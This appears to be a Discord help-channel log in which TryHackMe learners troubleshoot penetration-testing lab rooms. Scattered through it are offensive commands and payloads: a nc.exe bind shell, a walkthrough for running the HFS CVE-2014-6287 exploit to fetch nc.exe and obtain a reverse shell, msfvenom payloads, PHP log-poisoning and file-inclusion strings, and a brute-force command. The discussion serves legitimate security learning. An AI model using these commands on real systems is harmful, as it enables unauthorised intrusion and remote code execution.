Got it, Thank you!

Need help with JR Pen Test room Authentication Bypass task2 having some technical difficulties, linux commands are executing but no output

Can you post a screenshot of the issue you are having so we can better assist you? You'll need to verify your account to do so.

@minor wigeon

Could someone help me? I am stuck on File Inclusion Lab - Task 8; Capture flag2 at /etc/flag2:

Looks like the .php is automatically added. Might have figure a way to not have it add .php. null byte?

I tried practicing subdomain enumeration room task 4 but when i run this dns recon like it shown on the task it does not choosing the default namelist.txt on the dns recon tool for bruting the directories/subdomains on the domain
it showing no valid directories or specified or found within the tool ( i cross checked on the dnsrecon directory and could see the namelist , i dont know why its not equiping the namelist file for bruting)

in my vm machine

What is the exact command that you ran?

gg @lost robin

Just checked the man page and -d refers to domain and -D refers to dictionary. Have you tried supplying a dictionary file?

nope, but in thm SubDomain Enumeration room task 4 the shown site view does not provided any dictionary file in specific , the dns recon tooks the default wordlist in its directory called namelist.txt and i checked in my machine's tool the recon namelist.txt is available though but its not taking it as wordlist like in the site

How did you install dnsrecon or is it the one that come preinstalled (haven't used the tool yet)?

its on default kali, iam practicing this like shown in thm

btw why cant i access acmeitsupport.thm with its dns? i can able to get to the website only using the ip address not via the dns on attack box , need this for accessing the subdomain on the site that is enumerated on the tasks.........

Please I need help capturing flag3 for Local File Inclusion.

Refer the walkthrough blogs

Thank you let me go check it out

Gave +1 Rep to @fleet gate (current: #2066 - 1)

@fleet gate can you send a link pointing to your reference what I came across isn’t looking significant

I’ve done everything but the issue is the .php keeps being appended. I added the null byte but to no avail

it will be good if you send ss with detailed context and which task you are facing this in the room

Task 8, challenge 3

there are several walkthrough's i might see , did you checked this out? i cant send the links since it violate the rules

No I didn’t let me check them out

how can i find this keyword from the website server content , i mean when we sign up with an already existed account this keyword will show up right? so the fuff knows it already existed and marks the username for result. But in the website response content for the form i cant able to see this keyword ,it only shown up as username already existed with this account as in the html content.So how does the fuff knows this keyword? it simply looks through the response content from the server (in here html )and see if there is any match of the keyword we mentioned?

iam sorry for complicating this. To ask in summary how the fuff search for this keyword we mentioned in -mr flag in the website response?

will it look through all the html element content in the response?

What do you mean its not in the response? It was highlighted in the 2nd image?

It was looking at the website response as you added a filter in your ffuf command, which is -mr (match regex).

okay, cool. Now i understand

thank you

Gave +1 Rep to @prisma raptor (current: #13 - 530)

Set the domain name in your hosts file

Be cautious with loading huge lists, as it may cause Burp to crash. out of curiosity. How huge is huge?

140 mb

At the end of 'What the Shell' I'm trying to RDP into the windows server I added a user to, and then added that user to administrators group, but I keep getting errors.

Connecting using xfreerdp from attack box I get the below error after it shows it connects:

connected to 10.10.68.78:3389
SSL_read: I/O error: Connection reset by peer (104)

Found the answer, I had to add the user to the RDP group:
net localgroup "Remote Desktop Users" <username> /add

Room: Steel Mountain
Connection: via Attackbox
Does nc.exe only points to port 80? What if I specify my web server to other port? How can I point the nc.exe on other port?

I am using attackbox and port 80 can't be used for webserver. If I used a custom port for my webserver, how do I make nc.exe to point to my custom webserver port?

You may have to edit the script to reflect the same. However, I wasn't able to make it work, but others might have. Let's wait for them to chime in.

I'm not in the steel mountain room, but I just uploaded a nc.exe to a windows machine in the what the shell room.

All you should have to do is provide the port number after the IP:

nc 10.10.10.10 12345

If that doesn't work, and it's some kind of script, let me know and I'll take a look at the steel mountain room

I got a question about using the gtfo bins python rev shell. The command "socat ..." is ran on the attacking machine, and the following code has to be executed on the victim as a bash script? Is that correct?

https://gtfobins.github.io/gtfobins/python/

Did you use the Attackbox on it as well?

Haven't tried this one yet, but it seems so. Will try it when I get the chance and let you know.

No, I use a kali vm. But if you are using nc.exe it is supposed to be ran on a windows machine, that's what .exe files are for.

The command syntax for nc.exe is the same as nc binaries (linux nc command).

If you are connecting to a windows machine running nc.exe from the attack box this is what you run:

1. Have to upload nc.exe to windows machine.

2. Run this command on windows server to start nc as listener:

   nc.exe -lvnp 12345 -e cmd.exe

3. Run this command from Kali to connect to target running the listener:

nc <ip> <port>

That's a bind shell above.

Let me test a reverse shell for nc.exe on a windows machine to verify the exact commands

Just to add context, the challenge in here is modifying the script / exploit so that it would fetch ng nc.exe binary in a custom port. However, even when updating it (i.e., adding the port number and encoding the additional characters), it doesn't pick up the nc.exe binary in the custom port.

Also, the -e flag only works on certain nc versions so you'll have to check which one to use.

I'll take a look, been awhile since I did that room, but you should post about it in #offensive-pentesting-path because that room is in that path

You're on task 4?

You're not updating the nc at all. You're updating this exploit (https://www.exploit-db.com/exploits/39161) with the target ip and port.

It says under 'EDB Note' : You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).

You're using the exploit to copy nc.exe to the victim machine

Yes, you don't have to update the nc. @steep lynx was referring to that note there as the Attackbox uses port 80 and you should host the nc binary in that port. When I tried modifying the exploit to host nc on a non-standard port, it didn't fetch the nc binary in the non-standard port even when hosted in a python3 http.server.

Overall:

1. You are running the exploit from the attack box with this command:

python Exploit.py <Target IP address> <Target Port Number>

2. Before running that command above you need to be hosting a webserver from your attack box:

sudo python3 -m http.server 80

3. You need to be root to access ports below 1024, also, make sure you run that 'python3 -m http.server 80' from the directory that has nc.exe

I don't see anything saying you need to update the exploit.

If you did this is what you would update:

ip_addr = "192.168.44.128" #local IP address
local_port = "443" # Local Port number

Yeah, put your attack box IP and local_port as '80'

Don't forgot to change the Local IP address and Port number on the script"""

Says to do it in the error message at bottom of exploit

the exploit comes with a script to pull the 'nc.exe' file from the webserver you are hosting with this line
vbs = "C:\Users\Public\script.vbs| ......

Try it on the Attackbox and you'll see. 😀

full steps

1. Edit exploit lines below with your attack machine IP and port you are using '80':

   ip_addr = "192.168.44.128" #local IP address
   local_port = "443" # Local Port number

2. Have nc.exe in your current working directory

3. run command to launch web server:

   sudo python3 -m http.server 80

4. In separate terminal, continually run the exploit, once to download nc.exe, again to make the reverse shell happen.

python Exploit.py <Target IP address> <Target Port Number>

5. It's making the reverse shell with the same port as the web server with the below line, I'm guessing it will just turn your terminal hosting the webserver into a reverse shell, as you can't listen on that same port that is hosting the webserver.

   vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port

So, keep running the command in step 4 until it works. Wait 15 seconds between commands when you run it.

I'll try it tonight. Have to log off shortly.

The exploit that they link in the room has a bug.

Use this exploit: https://github.com/mrintern/thm_steelmountain_CVE-2014-6287/blob/main/http_fs_exploit.py

Follow the steps I listed above using that exploit. Once you run it once you'll see this:

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.215.228 - - [10/May/2024 19:59:56] "GET /nc.exe HTTP/1.1" 200 -
10.10.215.228 - - [10/May/2024 19:59:56] "GET /nc.exe HTTP/1.1" 200 -
10.10.215.228 - - [10/May/2024 19:59:56] "GET /nc.exe HTTP/1.1" 200 -
10.10.215.228 - - [10/May/2024 19:59:56] "GET /nc.exe HTTP/1.1" 200 -
10.10.215.228 - - [10/May/2024 19:59:59] code 400, message Bad request version ('6.3.9600]')
10.10.215.228 - - [10/May/2024 19:59:59] "Microsoft Windows [Version 6.3.9600]" 400 -
10.10.215.228 - - [10/May/2024 19:59:59] code 400, message Bad request version ('6.3.9600]')
10.10.215.228 - - [10/May/2024 19:59:59] code 400, message Bad request version ('6.3.9600]')

You'll keep seeing 'code 400, message Bad request. That means it got the nc.exe. Kill the webserver and run 'nc' from your attack box.

sudo nc -nlvp 80

Run the exploit again and you'll get in.

I just got in with it. That exploit they link throws a syntax error every time I tried to run it so there is definitely something wrong with it, but the exploit on that github page worked fine.

@prisma raptor I got in, see my explanation above. The exploit they link from THM has a bug, I provided a link to a working exploit.

@prisma raptor This link explains the port 80 situation. I had it left open from last night and read it before I closed it. Apparently the attack box uses port 80 for your connection to it, so you have to host the webserver and do the reverse shell to a different port. 1234 is a basic one to use

https://www.reddit.com/r/tryhackme/comments/rttbse/attackbox_steel_mountain_task_4_python_39161py/

no apparently about it, Attackbox does use port 80.

I was able to do the room without issues as I was using my own VM. It was actually for FryBait and not me. 😅

Hello, can someone help me understand how the SSRF request went through in the room: ssrfqi ?

Task 5: We have to replace one of the avatar selection form item's value with x/../private in order to bypass denylist and access the /private URL

Now I understand that we're tricking the target server by making it seem like the server host is actually sending the request to /private and not from our own computer.

And that we can use tricks like using localhost or similar alternative names to get the server reference

What I don't understand is how x/ is being resolved? Is it just getting ignored in this case? I don't think there is any endpoint /x on the server so I'm confused

If you have any explanation as to how this ssrf attack worked 🙏

#junior-pentester-path message

Is it just me, or is the "Privilege Escalation: Capabilities" section of the "Linux Privilege Escalation" room very confusing? It very briefly mentions what capabilities are without really saying much. Would have been nice with some explanation about what cap_setuid does and why it can be exploited.
EDIT: Figured it all out in the end, but the task could have benefited from some better explanation.

Maybe this could help -
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities

hi i'm new to tryhackme and struggling with the room "walking an application". I am looking for a directory flag in 'viewing the page source' but dont get the instructions at all.

in the instructions it says I should notice all the external files (css and javascript) are in the same directory. Im not sure what they are refering to or how to view directories from the source code. Thank you for any help!!

Look in the source, there is a secret link.

okay I clicked on every link, one of them took me to the second answer. But still not able to find the third answer about directories

Ah! That one.

Use a directory browser or burp to site map

okay awesome, can you explain what either of those are? sorry thank you again so much 🙏

Gave +1 Rep to @remote iris (current: #1 - 2276)

Burpsuite is a useful Web app pentest tool.

And directory browser hit a website with a dictionary to look for other webpages

Gobuster, ffuf.

Hi all!

I am ~40% through the path. Now I wonder if it makes sense to start to practice on some easy machines and which ones are good for starters, like me. Are there any machines that complement the path?
Or would you advise to finish the path first and start practicing afterwards?

Thanks in advance!

Finish the path. There is ctf's at the end that will focus on what you learned.

Allrighty! Thanks 🙂

Gave +1 Rep to @remote iris (current: #1 - 2288)

One question, is there not a little error. Doesnt this only whitelist the numbers from 0-9 without dots? How are you supposed to ping an IP without dots ?

,,The application will only accept a specific pattern of characters (the digits 0-9)
The application will then only proceed to execute this data which is all numerical.,,

The pattern on the picture matches/allows any combination of the digits 0-9 with a minimum of one digit. It doesn't match IP addresses.

But since the text says that as well, I assume whoever wrote it is aware of that. Doesn't make much sense in combination with ping, but maybe that's intended, I don't know.

👍

thx

probably only for demonstrational purpose

This is probably way out of scope, but when doing Linux Privilege Escalation room Task 11 - Privilege Escalation: NFS. The compiled C binary would not execute on the victim machine if I compiled it on my Kali machine, but it would if I compiled it on the Attack Box.

The error "./rootShell.out: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./rootShell.out)" seems to indicate a library was missing on the victim required to run it, but the exact same code compiled on the attack box works. I compiled them both with gcc.

Can anyone explain why? And a workaround so I can get a C binary compiled on Kalie to work?

Have you compared the versions of gcc on your kali machine and the attackbox? That could be a first indicator. gcc --version

Kali's version: gcc (Debian 13.2.0-23) 13.2.0
Attack boss version: gcc (Ubuntu 9.4.0-1ubuntu1~18.04) 9.4.0

I think the victim machine is Ubuntu. Maybe that' sit

Pretty sure it's the version difference.

Yeah, that must be it. Thanks!

Altough i wonder if it shouldnt be backwards compatiable. And you said it doesnt work when compiling with the higher version gcc

This ldd --version | head -n1 should give you the glibc version on each machine

This is using the victim from the next task, but I'd imagine it would be the same version. Also, the command wouldn't work when I ran it in tmux on kali, it just hung and ctrl-c wouldn't even kill it. Had to kill the pane. Which was weird:

victim: ldd (GNU libc) 2.17
kali: ldd (Debian GLIBC 2.37-15) 2.37
attack box: ldd (Ubuntu GLIBC 2.27-3ubuntu1.6) 2.27

I know ubuntu is closely related to Debian, so I didn't think that would cause the problem

You could add the flag -static when compiling your binary so it won't have dependency issues.

I'll try that real quick

Another way to solve this is described here - #room-help message

it worked. Thanks!

Good morning everyone. Could someone provide me with a solution to File Inclusion Module, Task 8 (Challenge) > question 3. It would be even better if someone could explain the hint provided in the question. Thanks in advance.

Hello, could someone advice why the flag is not accepted? I'm working on "Walking An Application" Task 3 Q4 "What is the framework flag?" I've worked out the hints and accessed the page: http://10-10-86-74.p.thmlabs.com/thm-framework-login I've got a flag there but it doesn't seem to be accepted by the system. Let me know if I need to provide any additional information.

The flag you tried would be a good start.

You can put text between double pipe symbols to turn it into a ||spoiler||

||THM{CHANGE_DEFAULT_CREDENTIALS}||

I think I figured it out. I was looking at the wrong flag for this question. :S

Hello, in the SQLi room I am facing the same SQL error message over and over even if I change the SQL request. Why is that?

Could sharing the error message and the sql query that causes it potentially help narrow down the issue?

my url: https://website.thm/article?id=1 UNION SELECT 1, 2, 3;

error msg: 
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION SELECT 1, 2, 3' at line 1

Are you using spaces between 1,2,database() ?

I tried both

Try copy and pasting the exact query they provide.

I tried before and now it's working... sorry for that unnecessary noise... and thank you

Computers sometimes are mysterious

I just finished the nfs task in the linux privilege escalation room, and I don't understand why using nfs is necessary. If the script can simply set the uid to root couldn't I do it manually without any need for file sharing?

As I understand it, the vulnerability we are exploiting in the case is the misconfiguration in how the share was created thus allowing the attacker or us to create a binary and run it in the context of a privileged user (root in this case). Strictly speaking, you could compile the exploit using the low privileged or regular user, but you wouldn't be able to escalate your privileges to root without leveraging the said vulnerability.

Hi! I have a question regarding the following text in the Stored XSS room:
"A blog website that allows users to post comments. Unfortunately, these comments aren't checked for whether they contain JavaScript or filter out any malicious code. If we now post a comment containing JavaScript, this will be stored in the database, and every other user now visiting the article will have the JavaScript run in their browser."

I dont quite get how the code would be executed. If i made a comment containing JS-code and it would be sent and stored in a database it would probably be stored as a string or something. Why would it be executed when a user fetches this data?

Let's say the website's html source has a paragraph

<p></p>

When the server dynamically creates the page it puts a user's comment between those tags. If the user now makes a comment like

<script>console.log('xss')</script>

which first gets stored in a database and retrieved whenever someone visits the comments section, what ends up in the html source now is:

<p><script>console.log('xss')</script></p>

And the JavaScript gets executed by the browser as if the developer had put it there originally.

Regarding your "it's just a string": Yes, but all the source code of a website, whether it's html, css or JavaScript is "just a string", all just text. Text which then gets interpreted by the browser.

Okey, i get it now :)! thanks for a great reply!

Gave +1 Rep to @patent dome (current: #79 - 79)

@prisma raptor But what is the misconfiguration?

The no_root_squash opting being on/enabled on the NFS server. https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/4/html/security_guide/s2-server-nfs-noroot

@patent dome I see, thank you.

Gave +1 Rep to @patent dome (current: #73 - 84)

You're still on cooldown

You're still on cooldown

You're still on cooldown

Gave 1 Rep to inf0s3cw4nn4b3 (current: #11 - 577)

Hi !. I was facing a minor difficulty in the Vulnerabilities Capstone room in the Vulnerability Research module. Should the netcat listener be setup before or after running the exploit python file. If it should be run before, then how can I run the python file without terminating the listener ? Thanks

What prevents you from doing both?

Sorry, I didn't understand what you are trying to say. Could you please elaborate ?

Should I upload pics from my AttackBox to make it more clear ?

Ideally yes. I don't quite understand how running the netcat listener prevents you from running a python file in parallel.

In order to share images here you need to verify.

So, does the listener continue to listen even after doing Ctrl+C ?

No, but you can open as many terminals as you want.

And even tabs within one terminal.

Ohh I see. I will try it that way and let you know.

You will very often have to have several terminals open at the same time.

Hi ! How to get past the problem highlighted in red? Module > Metasploit, Room > Metasploit: Exploitation

Is the file where you're calling it?

I have no idea. I have not interacted with any file upto this point in the room

In this question ( Module > Metasploit, Room > Metasploit: Exploitation, Task > Task 5 ), since the session is created and that system has username as Jon, how do I identify as user "pirate" and then use the Metasploit WordList to get the password ? Thanks

You don't have to,

search hashdump in metasploit

Ohh. Thanks for the help

Gave +1 Rep to @remote iris (current: #1 - 2431)

Just finished the File Inclusion room and it was the first to really make my head spin... Took some help from external sources and a little bit of hand holding but I got it!

file inclusion is hard

You should go through it once again. I took notes along and found it easy

There will be a room dedicated to RCE in the path. It’s Command Injection I believe.

I think the reason there is no RCE room is because it can be achieved in a number of ways such as file uploads, command injection, local file inclusion, etc.

I am currently busy with the File Inclusion room,and ooof ,I started 2nd guessing my career choices 🤣

Haven't done the room yet, but was pulling my hair in a challenge room I did which required an RCE via LFI. 😅 I'm still stuck in a couple of LFI challenge rooms, but its fun and frustrating at the same time. Planning to do the File Inclusion room soon myself.

Did you do the Terminator room ? Nice way to see RFI in action

I think.. if I have the correct room in mind. 😄

Awesome, do you want to play KoTH ?

Oh.. I'm not at that level yet. And haven't been able to touch THM much due to work. 😭

I am in the LFI room , and some of the solutions are not actually taught in the material at all, so........

i have done it all ,except RCE, how was i supposed to know || that i had to edit my username in cookies to be the entire file path?||

my thought process was ||Gain admin rights through cookies, then access file through the post request||

how do you mean?

i change guest to admin, in the cookie, then this shows up.

no error

Hi senseis, I am stuck at LFI challenge 3 and wonder if anyone can give me a hand?
This is completely new to me. I have not learnt burp either.
What I have tried is changing the method from GET to POST in Inspector. And then I input in the form ../../../../etc/flag3%00. I got the warning message with symbols but not working...

what if they are badly filtering out ../ what can you change it too where it would still be turned into ../ after the filtering is done

try putting in a path in the cookie

I have passed flag 2, but the reasoning behind it isn't clear, or even explained in the course material.

I finished the LFI room. I am doing the include room and I have been stuck for 2 days 🤣

Do you need help ?

Thanks so much for the offering man, allow me to give it another try based on sensei shadow_absorber, just got back from work lol

Gave +1 Rep to @maiden dagger (current: #2111 - 1)

I got the warning message of "Warning: include(../../../../etc/flag3%00.php)", but I thought %00 should help filter out the ".php" and suppose to get the flag...

yes but that is just part of the filter there is a second part for that flag if shadow recalls correctly

Thanks so much shadow sensei! I tried another method instead of simply playing around with the input form and it works. Kudos to you, thanks

Gave +1 Rep to @sage current (current: #4 - 1785)

im having a problem with the path is that i feel there's so much information, you finish with one thing and go to the next immidiately

eg once you're done the introduction to web hacking, you don't really review it all that much and you don't practice it so it isn't ingrained into memory i forgot everything...

is there something that I am missing? i have to redo the entire module and then I'm not sure what to do after

it get better with time, just jeep doing stuff. you can even reset progress ,and do it all again, maybe some of it will stick the 2nd or 3rd time you do it.

Thats the point to do notes. You can't remember everything in the Rooms. Write it down and it gets better.

Take notes along with screenshots on the Notion App

Revise your notes every morning before starting a new room

yes but im talking the practical part

of actually doing things i struggle

You mean the attackboxes?

yes

I always link the writeups for the practical parts to my notes

Most rooms have writeups available on infosec or medium

A lot of times you dont have to know everything. Sometimes it is enough that you heard about a topic and google it. In this path you should get a whole overview about the topic and use a few tools to get an understanding what they do. Don't learn the tools, learn the concepts behind - what they do and why! Tools will change, concepts stay the same (most of the time)

In the Windows Privilege Escalation room I can't move the reverse shell to the machine. It gives me the error "wget : Unable to connect to the remote server
At line:1 char:1

• wget http://10.10.119.198:8000/shell

•   + CategoryInfo          : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebR
   equest], WebException
    + FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequ
   estCommand"

Have you tried certutil.exe?

No. How do I use that?

Have you tried to do a Google search on it?

Have you tried with the file ending like http://<ip>:<port>shell.txt in ur wget command?

Well, I retried it yesterday and it worked without any errors.

Perfect

In the Windows privilege escalation room I don't understand how these "dangerous" privileges allow privesc on the machine since most seem to be disabled.

hmmmm

you are running the command prompt as administrator

try running it as the normal user

The task says to run as administrator using the given credentials for each account, and the exploits do work. It's just that in the third screenshot for instance, it is indicated that both the SeBackup and SeRestore priveleges are disabled so how does it work?

you know.... shadow has no idea what is going on here so just gonna leave it to someone else to try and figure out

Okay. Thanks anyway.

Gave +1 Rep to @sage current (current: #4 - 1813)

only thing shadow could guess is running on your host instead of the target machine but that would not make any sense

For task 7 of windows privilege escalation the syntax of the exploit does not work after modification; It won't allow me to create an account with a password with net user or New-LocalUser and if I create one without a password I can't run cmd with that user because blank passwords are not allowed. I got the flag by making the command read the contents of flag.txt into a file accessible by thm-unpriv.

Hey guys, I'm having trouble using ffuf in the authentication bypass room, Task 3. https://tryhackme.com/r/room/authenticationbypass
When it gets up to the Brute force section it only ever tries 1 username (the 2nd listed in the file) across all the different passwords. Thus returning no result.
I've looked over the packets using networkminer and it only ever sends POST requests using the admin username (the 2nd username in my valid_usernames.txt) file.
First picture is the NetworkMiner results.
The second is the layout of my valid_usernames.txt file

This is the command im running too (It is run in the correct directory):

ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.137.219/customers/login -fc 200

Are you running this command on the same directory where you have the valid_usernames.txt?

Yeah I am

And only the admin account is used and not the other ones?

yeah, it never tests for the other usernames

ok so i did some messing around with my txt file and i just overwrote what it had with the exact same content and it decided to work. I think it had something to do with me appending my ffuf results from the username enumeration into the file messing it up. Even after cleaning the data and retyping the entire document.

Thanks for your help nonetheless

Hello, I'm currently blocked in the LinPrivEsc on Task 11 where we exploit nfs no root squash to gain root privileges. When I execute my shell with suid bit set i don't get root access but only a shell with karen access:

$ ls -l
total 44
-rwxr-xr-x 1 root root 16040 Jul  7 09:45 shell
-rw-r--r-- 1 root root   125 Jul  7 09:45 shell.c
-rwsr-sr-x 1 root root   132 Jul  7 09:35 shell.elf
-rwsr-sr-x 1 root root    91 Jul  7 09:48 shell.py
drwx------ 3 root root  4096 Jul  7 09:02 snap.lxd
drwx------ 3 root root  4096 Jul  7 09:02 systemd-private-0e4b35374c0542baab5512e1648690bb-systemd-logind.service-HRYEXf
drwx------ 3 root root  4096 Jul  7 09:02 systemd-private-0e4b35374c0542baab5512e1648690bb-systemd-resolved.service-7ocgCf
drwx------ 3 root root  4096 Jul  7 09:02 systemd-private-0e4b35374c0542baab5512e1648690bb-systemd-timesyncd.service-KRZ5Ue
$ ./shell.elf
karen@ip-10-10-147-138:/tmp$ id
uid=1001(karen) gid=1001(karen) groups=1001(karen)

I generated the shell using msfvenom with msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfsmount/shell.elf
because when I execute the c programm I compiled I have this error

$ ./shell
./shell: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./shell))```

I also get karen shell and no root shell; if I'm doing something in python

#room-help message

My problem is not that i don't succeed in putting a shell on the target, but that when it's executed even if it is owned by root and has the suid bit set it doesn't grant me a root shell

Who owns shell.elf?

-rwsr-sr-x 1 root root 132 Jul 7 09:35 shell.elf

So what happens when you execute?

$ ./shell.elf
karen@ip-10-10-147-138:/tmp$ id
uid=1001(karen) gid=1001(karen) groups=1001(karen)

i got a shell but with karen

Seems to be the payload. Looking at it closely, your shell.elf simply called /bin/bash -p in your target or victim machine.

However, the /bin/bash binary in your target doesn't have the SUID bit set

Oh I see, so how can I generate a payload with msf venom that works ?

Doesn't the task include the suggested payload?

Or follow the instructions I linked to your message.

I'll follow he message even if I would like to know how to craft such a payload

Thanls

Someone solved the Include Challenge ? I have the solution but can't flag

the file inclusion room or the room literally called include???

The room (challenge) called Include

first or second flag???

Second flag

LFI + RCE

Tried with ssh and smtp log poisoning

if you have rce why do you have a shell???

*Why do you not have

This is the question

The room is bugging

I can send php.info

And have a good result

But when i try system.php("ls /var/www/html") for example the site crashs and i dont have anymore any log at /var/log/auth.log

I tried as well on my kali with exegol throw smtp but nothing is woeking

I watched some write up and it is working for them so I dont know i tried many times

even after restarting/reseting the targetmachine???

Yes I did it 2 times

Too much unstable

hmmm

Not the first time

it did not feel unstable in testing that is for sure

just to weed out any other problems here is something to try

Tonight i was working with the attack box

I was on the attack box so no the problem is not this

I try to flag it since 2 days

Throw exegol not working well as well

http://MACHINE_IP/profile.php?
img=....//....//....//....//....//....//....//....//....//....//var/log/mail.log&c=ls -lah

And if you have the solution throw smtp feel free to dm me please ;). I tried php.system("cmd") everywhere (FROM TO/SUBJECT ETC) i have never seen the payload in the mail.log

With which payload ?

from telnet using this as the payload towards smtp:

Include7MAIL FROM:<test1@tryhackme.com>
RCPT TO:<?php system($_GET['c']); ?>

Not working for recept to they want Charles for example

I tried many times

???

it worked for shadow

?

i.e the errors can mostly be ignored

OK lets try it tomorrow.
But i try this payload in MAIL FROM/SUBJECT ETC

Why we cant put this payload in the subject after data ?

subfect???

Subject

also there is 2 intended paths that work.... did you try both???

sadly it is against the rules for shadow to just hand over the flag even though they got it

so will try and help you get it yourself

More details please

npm log poisoning or the smtp route above

I tried ssh log poisoning and smtp log poisoning via telnet

yeah... but those are not npm log poisoning and you are not doing that over telnet

But watch a writeup and it is working as well

So what is your advice ?

From the website on the 4000 port ?

But how people solved it throw smtp via telnet and ssh if it is not possible 😅

port 50000 but yeah

smtp possible ssh not

Can you show me how is it possible via smtp (without telnet) ? I will send to you the commands that i taped during the morning

This website is on port 4000 not 50000 and used this funtionality to become admin.

I tried :
EHLO symbole
MAIL TO:thm.local@tryhackme.com
RCPT TO: charles
Data
Subject :<?php system($_GET['cmd']); ?>
Blabla
.

In the LFI&cmd=whoami I dont have any result. Try to put the payload in the MAIL TO field etc nothing is working

@sage current

Hi, could anyone please help with metasploit exploitation room > task 5.... I understand I'm using the right exploit according to the Hint, but the target machine is not vulnerable to ms17_010... Could anyone advice? Thanks in advance...

I don't know why I can't send a screenshot, but what I can tell is that I'm trying to use:

msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[] Started reverse TCP handler on 10.10.###.###:4444
[] 10.10.175.77:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[-] 10.10.175.77:445 - Host does NOT appear vulnerable.
[] 10.10.175.77:445 - Scanned 1 of 1 hosts (100% complete)
[-] 10.10.175.77:445 - The target is not vulnerable.
[] Exploit completed, but no session was created.

Question Hint

The target is missing the MS17-010 patch.

@serene gorge

Can you do show options and share the results?

would this be a good place to continue after the #878393611929129000 ?

Yes.

alright, thanks again

Gave +1 Rep to @neon geyser (current: #74 - 86)

surely going to buy premium after my finals so I can continue :)

Thank you for replying... I've found the issue... Call me noob but, I thought that I should use the target VM of task number 2 to all tasks in that page... Just now that I was going to replicate the error, I saw the green VM symbol on the right side of task 5... I could complete the task with success now... Thank you and sorry for disturbing the chat...

Gave +1 Rep to @prisma raptor (current: #11 - 608)

No worries. That's what the purpose of this discord / forum is, help other folks and foster learning.

hey folks, looks like the file inclusion room is striking again! I am absolutely stuck on the last question of the challenge "Gain RCE in Lab #Playground /playground.php with RFI to execute the hostname command. What is the output?" Im using the attack box and have tried making a http.server in terminal using sudo python3 -m http.server but i then cant access that server to make my cmd.txt file to force the flag. Any help!? thanks!

Well actually you have to particularly visit the challenge directory

And not the playground directory

Just visit "ip/challenges" directory and then you will find the challenges for which you will have to find the flag

Gaining rce is not the solution because you will not find anything........ Playground is just for your practice

As for the last challenge, you can go to revshell website and copy a simple php payload and put it on the website and then open up nc listener and it will be done

Oh…. Looks like I was going about it in a much more difficult way. If the Linux on attack box was more up to date, I would have been fine. Couldn’t open a sudo http and open another terminal and it work within it. It was just opening another terminal under root user

I don't think you can create python server on attackbox

Or maybe i haven't tried it yet

What nc listener are you using? -- And should i just go forth and download a VM program and not use attackbox? lol

I was going to wait until a little closer to school to go buy my actual laptop for cyber, currently just trying to get knowledge going into schooling using my old gaming laptop

Just go to revshell and there you will find php payload which will be only 1 line and you can then copy that...... As for the listener, when you visit revshell then you will find it out and then use that to get the flag....... You can use this listener on attackbox and it will work completely fine

hi not sure if this is the right channel, so im working on with the hydra learning pathhttps://tryhackme.com/r/room/hydra and I can't seem to access the weblink provided for the exercise: http://machine_ip/

You have to start the machine first, green button.

Whenever you see a link with machine_ip you have to start a machine and the IP will show in 1 minute.

You can only acces that webpage while connected to the THM network either tru openVPN from your own machine or tru the attackbox.

Anybody here work as a pentester?

Depending on your question, this might be better posted in #infosec-general .

NetSec Room:

question: Where flag?

nmap -T2 -ff -Pn -D 10.10.29.29,10.10.169.34,10.10.77.91,ME,10.10.161.201,10.10.68.157 -vv 10.10.29.27

command used

I think there was a problem with the scan because there are actually ports open and it didnt see

So i did many scans now, i also got the ports etc. but it is always on 0%

and it wont give me the flag

and now im not even done and it gave me the flag

someone might fix that

for those who have the same problem, if you use the -f(f) switch to fragmentate the packets it wont work because it may not detect those

Well i just completed this challenge yesterday and this is not what you should be doing

The solution to the last challenge is very simple..... You just need "nmap ip -sN" because the challenge states that you need to get the % as low as possible so you don't need to ping the host and that's it....

The challenge isn't broken because if you start from the beginning you might probably have scanned the ip and already sent packets to the system and most probably your system did a three way handshake

You need to reset the packets and you will clearly see the message that the packets were reset and then you can again do a stealth scan with just -sN tag you will get the flag

It said i should evade the ids of the vm. What i did was to evade ids. I had 0% many times even with resetting reloading etc.

Idk about you but in the previous rooms we learned about ids detection prevention

It need not be 0% for this challenge because when i did the scan it was at 7% but still gave the flag

That’s probably because of the ping

Hi everyone, I am currently working in the Windows Privilege Escalation room on Task 5 and have ran into a snag with the Insecure Service Permissions section. I have followed the steps up to restarting the THMService and keep getting this error regardless of what I try to do. Any assistance would be appreciated!

Will check when I get home if no-one can help you first.

@small zodiac are you in cmd or powershell?

In powershell you need to write sc.exe

@small zodiac Confirmed working with command prompt. Also confirming the need for the exe file extension in powershell.

Was in cmd. Thank you for the response!

Gave +1 Rep to @sour nymph (current: #870 - 4)

Thank you!

np at all.

your welcome 👍

thank you for being of the people that show their solution, i was having the same issue just now 😭 😂

Gave +1 Rep to @serene gorge (current: #2137 - 1)

I have a short question; when using msfvenom to list all payloads with msfvenom -l payloads it shows so many that i cant keep scrolling up beyond windows exploits, how can i see the full list?

Under profile preferences of your terminal you can select unlimited scroll back.

😮 thank you so much!

Hi

Hi, I just completed the Jr. Penetration Tester path. I'm wondering whether I should now pursue the Offensive Penetration Testing path or the Red Teaming path. Which one should I start with?

Greetings, all!
I just finished the LFI/RFI challenges, with some help from the discussion here. The last one was quite clever, which I appreciate greatly!

Thank you for everyone who's participating here!

You can find one of the recommended sequence or order by which to complete the learning paths - #general message

Thanks !

